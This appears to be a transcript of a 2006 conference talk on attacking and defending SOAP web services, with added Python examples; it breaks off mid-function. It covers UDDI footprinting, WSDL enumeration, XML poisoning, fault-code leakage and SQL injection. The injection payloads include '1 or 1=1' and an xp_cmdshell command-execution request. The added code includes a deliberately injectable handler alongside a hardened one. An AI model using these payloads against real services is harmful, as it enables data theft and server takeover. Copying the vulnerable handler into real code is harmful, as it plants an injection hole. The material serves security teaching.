Advanced Web Services Hacking (AusCERT 06)

Advanced Web Services Hacking (AusCERT 06) - Presentation Transcript

  1. Advanced Web Services Hacking Attacks & Defense Shreeraj Shah
  2. Introduction (brief)
     - Founder & Director, Net Square
     - Past experience: Chase, IBM & Foundstone
     - Interest: web security research
     - Published: advisories, tools, papers etc.
     - Book: Web Hacking
     - http://shreeraj.blogspot.com, shreeraj@net-square.com
  3. Agenda: Industry; Technologies; Web Services (TCP 80/443); Strategies & Methods; Tools; Attack Vectors & Exploits; Defense Controls; Corporate Security
  5. Industry
     - Web 2.0 applications are on the rise; Rich Internet Applications (RIA) are reshaping the application front end.
     - Web Services are on the rise, forming the back end of applications.
     - Gartner is advising companies to take up Web services now, or risk losing out to competitors embracing the technology.
  6. Industry
     - By 2008, those without Web Services or Service-Oriented Architecture (SOA) would find their competitors had left them in the dust. [Gartner]
     - 2006-07 would see the top 2000 global companies pick up the technology and make it mainstream; government and SMB would finally follow in 2008.
     - Web services would rocket from $1.6 billion in 2004 to $34 billion by 2007. [IDC]
  8. Technologies
     - Web Services are forming the back end and are accessible over SOAP.
     - AJAX is empowering browsers.
     - XML-based services.
     - Rich Internet Applications are consuming back-end web services.
     - Search engines and mechanisms exist for publishing and accessing web services.
     - Security is evolving around web services.
  9. Technologies [architecture diagram]: zones are Internet -> DMZ -> Trusted (Internal/Corporate). In the DMZ: web client, web server with scripted web servers and engine, static pages (HTML, HTM etc.), dynamic pages (ASP, DHTML, PHP, CGI etc.), web client framework, integrated ASP.NET with .NET / J2EE, app server, web services. On the trusted side: SOAP web service and DB.
  10. Technologies [diagram]: a web client makes simple GET/POST calls to HTTP resources and AJAX calls to web services; a web services client talks to web services on the server.
  11. Web services stack
     - Presentation stack: XML
     - Security stack: WS-Security
     - Discovery stack: UDDI, DISCO
     - Access stack: WSDL, SOAP
     - Transport stack: HTTP, HTTPS
  13. Security!
     - Web services are evolving as a new attack point in the application framework.
     - Toolkits and exploits are coming up.
     - Too many protocols, and confusion.
     - Race for deployment leads to poor implementation.
     - Cases and attacks are growing with the growth in business usage.
  15. Assessment strategies [diagram]: Web Services Risk Model -> Blackbox Assessment and Whitebox Assessment -> Web Services Defense Controls
  16. Risk - In transit
     - Sniffing or spoofing
     - WS-Routing security concern
     - Replay attacks
  17. Risk - Web services engine
     - Buffer overflow
     - XML parsing attacks
     - Spoiling schema
     - Complex or recursive structure as payload
     - Denial of service
     - Large payload
  18. Risk - Web services deployment
     - Fault code leaks
     - Permissions & access issues
     - Poor policies
     - Customized error leakage
     - Authentication and certification
  19. Risk - Web services user code
     - Parameter tampering
     - WSDL probing
     - SQL/LDAP/XPATH/OS command injection
     - Virus/Spyware/Malware injection
     - Brute force
     - Data type mismatch
     - Content spoofing
     - Session tampering
     - Format string
     - Information leakage
     - Authorization
  21. wschess (Tool): components wsPawn, wsFootprint, wsSearch, wsDiscovery, wsEnum, wsKnight, wsAudit, wsProxy, wsMod and wsRook, covering footprinting, discovery, public domain search, enumeration, manual audit, auto audit and defense. Download: http://net-square.com/wschess/
  22. Agenda: Strategies & Methods (Footprinting, Discovery, Public Domain search)
  23. Web Services Footprinting
  24. Footprinting objectives
     - Where do web services live?
     - We may know the company name; is there any "whois" for web services?
     - If we can answer these questions, we have enough information on what to assess.
  25. UDDI
     - Universal Description, Discovery, and Integration (UDDI)
     - Acts as white/yellow/green pages
     - Xmethods etc.
     - Information can be published to and retrieved from it
     - Gets replicated across networks over the internet
  26. UDDI includes
     - businessEntity
     - businessService
     - bindingTemplate
     - tModel
  27. Footprinting: business name (UDDI find_business request)
     POST /inquire HTTP/1.1
     Content-Type: text/xml; charset=utf-8
     SOAPAction: ""
     Cache-Control: no-cache
     Pragma: no-cache
     User-Agent: Java/1.4.2_04
     Host: uddi.microsoft.com
     Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
     Connection: keep-alive
     Content-Length: 229

     <?xml version="1.0" encoding="UTF-8" ?>
     <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
     <Body>
     <find_business generic="2.0" maxRows="100" xmlns="urn:uddi-org:api_v2"><name>amazon</name></find_business>
     </Body>
     </Envelope>

     HTTP/1.1 100 Continue
  28. Footprinting: business name (UDDI find_business response)
     HTTP/1.1 200 OK
     Date: Tue, 28 Sep 2004 09:53:53 GMT
     Server: Microsoft-IIS/6.0
     X-Powered-By: ASP.NET
     X-AspNet-Version: 1.1.4322
     Cache-Control: private, max-age=0
     Content-Type: text/xml; charset=utf-8
     Content-Length: 1339

     <?xml version="1.0" encoding="utf-8"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
     <soap:Body>
     <businessList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2">
     <businessInfos>
     <businessInfo businessKey="bfb9dc23-adec-4f73-bd5f-5545abaeaa1b">
     <name xml:lang="en-us">Amazon Web Services for Testing</name>
     <description xml:lang="ko">Amazon Web Services 2.0 - We now offer software developers the opportunity to integrate Amazon.com</description>
     <serviceInfos>
     <serviceInfo serviceKey="41213238-1b33-40f4-8756-c89cc3125ecc" businessKey="bfb9dc23-adec-4f73-bd5f-5545abaeaa1b">
     <name xml:lang="en-us">Amazon Web Services 2.0</name>
     </serviceInfo>
     </serviceInfos>
     </businessInfo>
     <businessInfo businessKey="18b7fde2-d15c-437c-8877-ebec8216d0f5">
     <name xml:lang="en">Amazon.com</name>
     <description xml:lang="en">E-commerce website and platform for finding, discovering, and buying products online.</description>
     <serviceInfos>
     <serviceInfo serviceKey="ba6d9d56-ea3f-4263-a95a-eeb17e5910db" businessKey="18b7fde2-d15c-437c-8877-ebec8216d0f5">
     <name xml:lang="en">Amazon.com Web Services</name>
     </serviceInfo>
     </serviceInfos>
     </businessInfo>
     </businessInfos>
     </businessList>
     </soap:Body>
     </soap:Envelope>
  29. Footprinting: services (UDDI find_service request)
     POST /inquire HTTP/1.1
     Content-Type: text/xml; charset=utf-8
     SOAPAction: ""
     Cache-Control: no-cache
     Pragma: no-cache
     User-Agent: Java/1.4.2_04
     Host: uddi.microsoft.com
     Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
     Connection: keep-alive
     Content-Length: 213

     <?xml version="1.0" encoding="UTF-8" ?>
     <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
     <Body>
     <find_service generic="2.0" xmlns="urn:uddi-org:api_v2"><name>amazon</name></find_service>
     </Body>
     </Envelope>

     HTTP/1.1 100 Continue
  30. Footprinting: services (UDDI find_service response)
     HTTP/1.1 200 OK
     Date: Tue, 28 Sep 2004 10:07:42 GMT
     Server: Microsoft-IIS/6.0
     X-Powered-By: ASP.NET
     X-AspNet-Version: 1.1.4322
     Cache-Control: private, max-age=0
     Content-Type: text/xml; charset=utf-8
     Content-Length: 1272

     <?xml version="1.0" encoding="utf-8"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
     <soap:Body>
     <serviceList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2">
     <serviceInfos>
     <serviceInfo serviceKey="6ec464e0-2f8d-4daf-b4dd-5dd4ba9dc8f3" businessKey="914374fb-f10f-4634-b8ef-c9e34e8a0ee5"><name xml:lang="en-us">Amazon Research Pane</name></serviceInfo>
     <serviceInfo serviceKey="41213238-1b33-40f4-8756-c89cc3125ecc" businessKey="bfb9dc23-adec-4f73-bd5f-5545abaeaa1b"><name xml:lang="en-us">Amazon Web Services 2.0</name></serviceInfo>
     <serviceInfo serviceKey="ba6d9d56-ea3f-4263-a95a-eeb17e5910db" businessKey="18b7fde2-d15c-437c-8877-ebec8216d0f5"><name xml:lang="en">Amazon.com Web Services</name></serviceInfo>
     <serviceInfo serviceKey="bc82a008-5e4e-4c0c-8dba-c5e4e268fe12" businessKey="18785586-295e-448a-b759-ebb44a049f21"><name xml:lang="en">AmazonBookPrice</name></serviceInfo>
     <serviceInfo serviceKey="8faa80ea-42dd-4c0d-8070-999ce0455930" businessKey="ee41518b-bf99-4a66-9e9e-c33c4c43db5a"><name xml:lang="en">AmazonBookPrice</name></serviceInfo>
     </serviceInfos>
     </serviceList>
     </soap:Body>
     </soap:Envelope>
  31. Footprinting: tModels (UDDI find_tModel request)
     POST /inquire HTTP/1.1
     Content-Type: text/xml; charset=utf-8
     SOAPAction: ""
     Cache-Control: no-cache
     Pragma: no-cache
     User-Agent: Java/1.4.2_04
     Host: uddi.microsoft.com
     Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
     Connection: keep-alive
     Content-Length: 211

     <?xml version="1.0" encoding="UTF-8" ?>
     <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
     <Body>
     <find_tModel generic="2.0" xmlns="urn:uddi-org:api_v2"><name>amazon</name></find_tModel>
     </Body>
     </Envelope>

     HTTP/1.1 100 Continue
  32. Footprinting: tModels (UDDI find_tModel response)
     HTTP/1.1 200 OK
     Date: Tue, 28 Sep 2004 10:12:42 GMT
     Server: Microsoft-IIS/6.0
     X-Powered-By: ASP.NET
     X-AspNet-Version: 1.1.4322
     Cache-Control: private, max-age=0
     Content-Type: text/xml; charset=utf-8
     Content-Length: 516

     <?xml version="1.0" encoding="utf-8"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
     <soap:Body>
     <tModelList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2">
     <tModelInfos>
     <tModelInfo tModelKey="uuid:c5da9443-d058-4ede-9db1-4f1d5deb805c"><name>Amazon Web Services 2.0 WSDL File</name></tModelInfo>
     </tModelInfos>
     </tModelList>
     </soap:Body>
     </soap:Envelope>
     DEMO
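As an added example (not part of the presentation or the wschess tool), here is the footprinting step of slides 27-31 in Python: build the UDDI v2 find_business / find_service / find_tModel inquiry body and pull the businessKey and serviceKey values out of a businessList response. The sample response is the slide 28 body with its line-break artefacts removed; the builder XML-escapes the search string so it cannot break out of the <name> element.

```python
from xml.sax.saxutils import escape
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
UDDI_NS = "urn:uddi-org:api_v2"
INQUIRIES = ("find_business", "find_service", "find_tModel")


def build_inquiry(kind, name, max_rows=None):
    """Build the UDDI v2 inquiry body the slides POST to /inquire.

    kind is find_business, find_service or find_tModel; name is the search
    string, escaped so a value such as "a<b" stays inside <name>."""
    if kind not in INQUIRIES:
        raise ValueError("unsupported inquiry: %s" % kind)
    rows = ' maxRows="%d"' % max_rows if max_rows is not None else ""
    return (
        '<?xml version="1.0" encoding="UTF-8" ?>'
        '<Envelope xmlns="%s"><Body>'
        '<%s generic="2.0"%s xmlns="%s"><name>%s</name></%s>'
        '</Body></Envelope>' % (SOAP_NS, kind, rows, UDDI_NS, escape(name), kind)
    ).encode("utf-8")


def parse_business_list(xml_text):
    """Collect businessKey / serviceKey pairs from a businessList response.

    These keys are what the discovery step feeds back into the registry to
    obtain bindingTemplates, and with them the access points."""
    root = ET.fromstring(xml_text)
    found = []
    for info in root.iter("{%s}businessInfo" % UDDI_NS):
        found.append({
            "businessKey": info.get("businessKey"),
            "name": info.findtext("{%s}name" % UDDI_NS),
            "services": [
                (svc.get("serviceKey"), svc.findtext("{%s}name" % UDDI_NS))
                for svc in info.iter("{%s}serviceInfo" % UDDI_NS)
            ],
        })
    return found


# Response body copied from slide 28 (XML declaration dropped, split keys rejoined).
SAMPLE_BUSINESS_LIST = (
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soap:Body><businessList generic="2.0" operator="Microsoft Corporation" '
    'truncated="false" xmlns="urn:uddi-org:api_v2"><businessInfos>'
    '<businessInfo businessKey="bfb9dc23-adec-4f73-bd5f-5545abaeaa1b">'
    '<name xml:lang="en-us">Amazon Web Services for Testing</name>'
    '<serviceInfos><serviceInfo serviceKey="41213238-1b33-40f4-8756-c89cc3125ecc" '
    'businessKey="bfb9dc23-adec-4f73-bd5f-5545abaeaa1b">'
    '<name xml:lang="en-us">Amazon Web Services 2.0</name></serviceInfo></serviceInfos>'
    '</businessInfo>'
    '<businessInfo businessKey="18b7fde2-d15c-437c-8877-ebec8216d0f5">'
    '<name xml:lang="en">Amazon.com</name>'
    '<serviceInfos><serviceInfo serviceKey="ba6d9d56-ea3f-4263-a95a-eeb17e5910db" '
    'businessKey="18b7fde2-d15c-437c-8877-ebec8216d0f5">'
    '<name xml:lang="en">Amazon.com Web Services</name></serviceInfo></serviceInfos>'
    '</businessInfo></businessInfos></businessList></soap:Body></soap:Envelope>'
)

if __name__ == "__main__":
    print(build_inquiry("find_business", "amazon", max_rows=100).decode())
    for entry in parse_business_list(SAMPLE_BUSINESS_LIST):
        print(entry["businessKey"], entry["name"])
        for key, name in entry["services"]:
            print("   ", key, name)
```

Sending the request is the easy part (any HTTP client that can set SOAPAction works); the useful output of this stage is the key list, which the discovery slides that follow turn into access points.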
  33. Web Services Discovery
  34. Web Service Discovery
     - After footprinting web services, the next step is to perform discovery.
     - It is done on the basis of the services found.
     - Finding the access point of a web service is the aim of discovery.
     - Discovery is the key to the kingdom.
     - Once again, it is done over UDDI.
  35. Web Service Discovery
     - From the various keys (service and business) one can dig the access point out of UBN.
     - This is part of the protocol and is identified from the XML block itself.
     DEMO
  36. Web Service Search
     - Search in the public domain
     - Use search engines: Google & MSN, an excellent tool
     - Look for wsdl, asmx, jws etc.
     - filetype and allinurl are best friends
     - Leverage the search engines' Web APIs
     DEMO
  37. Web Services Enumeration & Profiling
  38. Technology identification
     - Running on which platform?
     - Configuration and structures
     - File extensions
     - Path discovery
     - This is very useful information
  39. Demo application: Web Services, location of WSDL
  40. Technology identification
     - Location can be obtained from UDDI as well, if already published.
     - WSDL location [access point]: http://192.168.11.2/ws/dvds4less.asmx?wsdl
     - .asmx indicates a .NET server from MS
  41. Technology identification
     - Similarly, .jws indicates Java web services.
     - /ws/ in the path indicates web services.
     - MS SOAP Toolkit can be identified as well.
     C:\>nc 192.168.11.2 80
     HEAD / HTTP/1.0

     HTTP/1.1 200 OK
     Server: Microsoft-IIS/5.0
     Date: Tue, 28 Sep 2004 18:48:20 GMT
     X-Powered-By: ASP.NET
     Connection: Keep-Alive
     Content-Length: 7565
     Content-Type: text/html
     Set-Cookie: ASPSESSIONIDSSSRQDRC=LMMPKHNAAOFDHMIHAODOJHCO; path=/
     Cache-control: private
  42. Technology identification
     - The resource header spits out some information as well (X-AspNet-Version gives the exact framework build).
     C:\>nc 192.168.11.2 80
     HEAD /ws/dvds4less.asmx HTTP/1.0

     HTTP/1.1 500 Internal Server Error
     Server: Microsoft-IIS/5.0
     Date: Tue, 28 Sep 2004 18:50:09 GMT
     X-Powered-By: ASP.NET
     X-AspNet-Version: 1.1.4322
     Cache-Control: private
     Content-Type: text/html; charset=utf-8
     Content-Length: 3026
  43. WSDL scanning/enumeration
     - What is WSDL?
     - What information can one enumerate from WSDL?
     - Is WSDL exposure a threat or not?
  44. WSDL
     - WSDL is the Web Services Description Language.
     - It is similar to the old IDL used for remote calls in CORBA and other remote invocation methods.
     - It contains details of methods, types of I/O and parameters of methods.
     - It is an XML document with standards.
  45. Nodes of WSDL [diagram]: Types (data types), Message, PortType (operations), Binding, Service (access)
  46. WSDL <service>: where the call is going to hit, i.e. where the service is listening
     <service name="dvds4less">
       <port name="dvds4lessSoap" binding="s0:dvds4lessSoap">
         <soap:address location="http://192.168.11.2/ws/dvds4less.asmx"/>
       </port>
     </service>
  47. WSDL <portType>: the methods one can call
     <portType name="dvds4lessSoap">
       <operation name="Intro">
         <input message="s0:IntroSoapIn"/>
         <output message="s0:IntroSoapOut"/>
       </operation>
       <operation name="getProductInfo">
         <input message="s0:getProductInfoSoapIn"/>
         <output message="s0:getProductInfoSoapOut"/>
       </operation>
       <operation name="getRebatesInfo">
         <input message="s0:getRebatesInfoSoapIn"/>
         <output message="s0:getRebatesInfoSoapOut"/>
       </operation>
     </portType>
  48. WSDL <message>: each operation's input and output message names the schema element it carries
     <portType name="dvds4lessSoap">
       <operation name="getProductInfo">
         <input message="s0:getProductInfoSoapIn"/>
         <output message="s0:getProductInfoSoapOut"/>
       </operation>
     </portType>
     <message name="getProductInfoSoapIn">
       <part name="parameters" element="s0:getProductInfo"/>
     </message>
     <message name="getProductInfoSoapOut">
       <part name="parameters" element="s0:getProductInfoResponse"/>
     </message>
  49. WSDL <types>: the schema elements give the parameter names and types
     <message name="getProductInfoSoapIn">
       <part name="parameters" element="s0:getProductInfo"/>
     </message>
     <message name="getProductInfoSoapOut">
       <part name="parameters" element="s0:getProductInfoResponse"/>
     </message>
     <s:element name="getProductInfo">
       <s:complexType>
         <s:sequence>
           <s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/>
         </s:sequence>
       </s:complexType>
     </s:element>
     <s:element name="getProductInfoResponse">
       <s:complexType>
         <s:sequence>
           <s:element minOccurs="0" maxOccurs="1" name="getProductInfoResult" type="s:string"/>
  50. WSDL profile after scan
     Method          INPUT    OUTPUT
     Intro           -No-     String
     getProductInfo  String   String
     getRebatesInfo  String   String
     DEMO
  51. How it looks? [diagram]: the WSDL (<Service>, <PortType>, <Message>, <Types>) describes a remote class whose methods Intro, getProductInfo and getRebatesInfo the web services code invokes.
  53. Web Services Attack Vectors
  54. AV 1 - XML poisoning
     - XML node manipulation
     - Attack on parsing logic: SAX, DOM
     - Can be lethal: DoS or breaking execution logic
  55. XML poisoning: a normal record
     <CustomerRecord>
       <CustomerNumber>289001</CustomerNumber>
       <FirstName>John</FirstName>
       <LastName>Smith</LastName>
       <Address>Apt 31, 1st Street</Address>
       <Email>john@smith.com</Email>
       <PhoneNumber>3809922347</PhoneNumber>
     </CustomerRecord>
  56. XML poisoning: nodes spliced in a second time
     <CustomerRecord>
       <CustomerNumber>289001</CustomerNumber>
       <FirstName>John</FirstName><CustomerNumber>289001</CustomerNumber>
       <FirstName>John</FirstName>
       <LastName>Smith</LastName>
       <Address>Apt 31, 1st Street</Address>
       <Email>john@smith.com</Email>
       <PhoneNumber>3809922347</PhoneNumber>
     </CustomerRecord>
  57. XML poisoning: a node repeated 100 times
     <CustomerRecord>
       <CustomerNumber>289001</CustomerNumber>
       <FirstName>John</FirstName>
       <FirstName>John</FirstName>
       ... 100 times ...
       <FirstName>John</FirstName>
       <LastName>Smith</LastName>
       <Address>Apt 31, 1st Street<Address>
       <Email>john@smith.com<Email>
       <PhoneNumber>3809922347<PhoneNumber>
     </CustomerRecord>
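An added example, not from the presentation: a streaming check for the customer record that rejects the poisoned variants of slides 56 and 57 before any DOM is built. Limits on payload size, nesting depth and per-node occurrence are the practical defence behind "attack on parsing logic"; the records are constructed from slide 55, and the truncated one is a constructed extra.

```python
import io
import xml.etree.ElementTree as ET

EXPECTED = {"CustomerNumber", "FirstName", "LastName", "Address", "Email", "PhoneNumber"}

# Slide 55 as bytes.
CLEAN = (b"<CustomerRecord><CustomerNumber>289001</CustomerNumber>"
         b"<FirstName>John</FirstName><LastName>Smith</LastName>"
         b"<Address>Apt 31, 1st Street</Address><Email>john@smith.com</Email>"
         b"<PhoneNumber>3809922347</PhoneNumber></CustomerRecord>")

# Slide 56: CustomerNumber and FirstName spliced in a second time.
DUPLICATED = CLEAN.replace(
    b"<FirstName>John</FirstName>",
    b"<FirstName>John</FirstName><CustomerNumber>289001</CustomerNumber>"
    b"<FirstName>John</FirstName>", 1)

# Constructed: the document cut off half way, the sort of input a DOM parser chokes on.
TRUNCATED = CLEAN[:len(CLEAN) // 2]


def repeated_record(n):
    """Slide 57 with well-formed tags: FirstName repeated n times (constructed)."""
    return CLEAN.replace(b"<FirstName>John</FirstName>",
                         b"<FirstName>John</FirstName>" * n, 1)


def check_customer_record(data, max_bytes=4096, max_depth=2):
    """Return (ok, reason). Streams the document with iterparse so the size,
    depth and duplicate-node limits are enforced before any tree is built."""
    if len(data) > max_bytes:
        return False, "payload too large: %d bytes" % len(data)
    seen = {}
    depth = 0
    try:
        for event, elem in ET.iterparse(io.BytesIO(data), events=("start", "end")):
            if event == "end":
                depth -= 1
                continue
            depth += 1
            if depth > max_depth:
                return False, "nesting deeper than %d at <%s>" % (max_depth, elem.tag)
            if depth == 1 and elem.tag != "CustomerRecord":
                return False, "unexpected root <%s>" % elem.tag
            if depth == 2:
                if elem.tag not in EXPECTED:
                    return False, "unexpected node <%s>" % elem.tag
                seen[elem.tag] = seen.get(elem.tag, 0) + 1
                if seen[elem.tag] > 1:
                    return False, "duplicate node <%s>" % elem.tag
    except ET.ParseError as exc:
        return False, "malformed XML: %s" % exc
    missing = EXPECTED - set(seen)
    if missing:
        return False, "missing nodes: " + ", ".join(sorted(missing))
    return True, "ok"


if __name__ == "__main__":
    for label, doc in [("clean", CLEAN), ("duplicated", DUPLICATED),
                       ("repeated x100", repeated_record(100)),
                       ("repeated x100000", repeated_record(100000)),
                       ("truncated", TRUNCATED)]:
        print("%-18s %s" % (label, check_customer_record(doc)))
```

The order of the checks matters: the byte limit runs before the parser sees anything, and the depth and occurrence checks fire on the start event, so the 100-times and recursive payloads are rejected after a few hundred bytes rather than after the whole document has been materialised. A schema validator gives the same answer for the duplicate case, but most of them build the tree first.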
  58. AV 2 - Parameter tampering & fault code leakage
     - The fault code of a web service spits out a lot of information about its internal workings.
     - This attack can fetch internal paths, database interfaces etc.
     - The fault code is part of the SOAP envelope and helps an attacker make logical deductions about assets.
     DEMO
  59. SOAP request: forcing a fault code (source of enumeration). The method called is getRebatesInfo; <fileinfo> is the input to the method.
     <?xml version="1.0" encoding="utf-16"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
       <soap:Body>
         <getRebatesInfo xmlns="http://tempuri.org/">
           <fileinfo>abx.xyz</fileinfo>
         </getRebatesInfo>
       </soap:Body>
     </soap:Envelope>
     DEMO
  60. SOAP response: the fault code enumerates the internal path
     <?xml version="1.0" encoding="utf-16"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
       <soap:Body>
         <soap:Fault>
           <faultcode>soap:Server</faultcode>
           <faultstring>Server was unable to process request. --&gt; Could not find file &quot;c:\inetpub\wwwroot\rebates\abx.xyz&quot;.</faultstring>
           <detail />
         </soap:Fault>
       </soap:Body>
     </soap:Envelope>
  61. AV 3 - SQL injection
     - SQL injection can be done using SOAP traffic.
     - It is an innovative way of identifying database interface points.
     - One can leverage xp_cmdshell via SOAP.
     - The back-end database can be compromised using this attack.
     DEMO
  62. SOAP request: the method called is getProductInfo; <id> is the input to the method.
     <?xml version="1.0" encoding="utf-16"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
       <soap:Body>
         <getProductInfo xmlns="http://tempuri.org/">
           <id>1</id>
         </getProductInfo>
       </soap:Body>
     </soap:Envelope>
  63. SOAP response: product information
     <?xml version="1.0" encoding="utf-16"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
       <soap:Body>
         <getProductInfoResponse xmlns="http://tempuri.org/">
           <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
         </getProductInfoResponse>
       </soap:Body>
     </soap:Envelope>
  64. SOAP response: the fault code indicates SQL Server, a place for SQL injection
     <?xml version="1.0" encoding="utf-16"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
       <soap:Body>
         <soap:Fault>
           <faultcode>soap:Server</faultcode>
           <faultstring>Server was unable to process request. --&gt; Cannot use empty object or column names. Use a single space if necessary.</faultstring>
           <detail />
         </soap:Fault>
       </soap:Body>
     </soap:Envelope>
     DEMO
  65. SOAP request: popular SQL injection
     <?xml version="1.0" encoding="utf-16"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
       <soap:Body>
         <getProductInfo xmlns="http://tempuri.org/">
           <id>1 or 1=1</id>
         </getProductInfo>
       </soap:Body>
     </soap:Envelope>
  66. SOAP response: works!! The entire table is out.
     <?xml version="1.0" encoding="utf-16"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
       <soap:Body>
         <getProductInfoResponse xmlns="http://tempuri.org/">
           <getProductInfoResult>/(1)Finding Nemo($14.99)/ /(2)Bend it like Beckham($12.99)/ /(3)Doctor Zhivago($10.99)/ /(4)A Bug's Life($13.99)/ /(5)Lagaan($12.99)/ /(6)Monsoon Wedding($10.99)/ /(7)Lawrence of Arabia($14.99)/</getProductInfoResult>
         </getProductInfoResponse>
       </soap:Body>
     </soap:Envelope>
  67. SOAP request: exploiting this vulnerability (exploit code)
     <?xml version="1.0" encoding="utf-16"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
       <soap:Body>
         <getProductInfo xmlns="http://tempuri.org/">
           <id>1;EXEC master..xp_cmdshell 'dir c:\ > c:\inetpub\wwwroot\ws\dir.txt'</id>
         </getProductInfo>
       </soap:Body>
     </soap:Envelope>
  68. SOAP response: works!! It looks like a normal response.
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
       <soap:Body>
         <getProductInfoResponse xmlns="http://tempuri.org/">
           <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
         </getProductInfoResponse>
       </soap:Body>
     </soap:Envelope>
  69. SOAP response: but the code got executed. The response looks normal, yet admin was obtained via xp_cmdshell.
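As an added example (my code, with an in-memory SQLite table standing in for the demo's SQL Server back end), here is the parameter path of slides 62-69: the vulnerable handler concatenates <id> into the query exactly as the demo service does, so "1 or 1=1" dumps the table and a syntax error leaks the driver message; the hardened handler validates the parameter as an integer, binds it, and returns a generic fault. The seven catalogue rows are constructed from the slide 66 dump. One caveat the code makes explicit: the stacked "1;EXEC master..xp_cmdshell" payload of slide 67 needs a DBMS and driver that run several statements per call, which SQL Server does and sqlite3 refuses.

```python
import re
import sqlite3
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SVC_NS = "http://tempuri.org/"

# Constructed catalogue: the seven rows the slide 66 dump shows.
CATALOGUE = [
    (1, "Finding Nemo", 14.99), (2, "Bend it like Beckham", 12.99),
    (3, "Doctor Zhivago", 10.99), (4, "A Bug's Life", 13.99),
    (5, "Lagaan", 12.99), (6, "Monsoon Wedding", 10.99),
    (7, "Lawrence of Arabia", 14.99),
]


def open_db():
    """In-memory stand-in for the demo's SQL Server table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE dvds (id INTEGER PRIMARY KEY, title TEXT, price REAL)")
    db.executemany("INSERT INTO dvds VALUES (?, ?, ?)", CATALOGUE)
    return db


def request(product_id):
    """The slide 62 envelope with the given <id> text (constructed helper)."""
    return ('<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
            '<soap:Body><getProductInfo xmlns="%s"><id>%s</id></getProductInfo>'
            '</soap:Body></soap:Envelope>' % (SVC_NS, escape(product_id)))


def extract_param(envelope, method, param):
    """Read <param> from <soap:Body><method xmlns="http://tempuri.org/">."""
    node = ET.fromstring(envelope).find(".//{%s}%s/{%s}%s" % (SVC_NS, method, SVC_NS, param))
    return node.text if node is not None else None


def get_product_info_vulnerable(db, product_id):
    # The demo service's mistake: the SOAP parameter is concatenated into the SQL text.
    return db.execute("SELECT id, title, price FROM dvds WHERE id = " + product_id).fetchall()


def get_product_info_hardened(db, product_id):
    # The WSDL only says xsd:string, so enforce the real type here, then bind the value.
    if not re.fullmatch(r"[0-9]{1,9}", product_id or ""):
        raise ValueError("id must be an integer")
    return db.execute("SELECT id, title, price FROM dvds WHERE id = ?",
                      (int(product_id),)).fetchall()


def stacked_statement_accepted(db, product_id):
    """True if the driver runs the 'id;EXEC ...' payload of slide 67 as two statements.
    sqlite3 refuses more than one statement per execute(); SQL Server runs them."""
    try:
        get_product_info_vulnerable(db, product_id)
        return True
    except (sqlite3.Error, sqlite3.Warning):
        return False


def handle_request(db, envelope, hardened):
    """Serve getProductInfo and answer in the response / fault shape of slides 63-64."""
    product_id = extract_param(envelope, "getProductInfo", "id")
    lookup = get_product_info_hardened if hardened else get_product_info_vulnerable
    try:
        rows = lookup(db, product_id)
    except (ValueError, sqlite3.Error, sqlite3.Warning) as exc:
        if hardened:
            message = "Invalid request."  # generic: nothing about driver, table or columns
        else:
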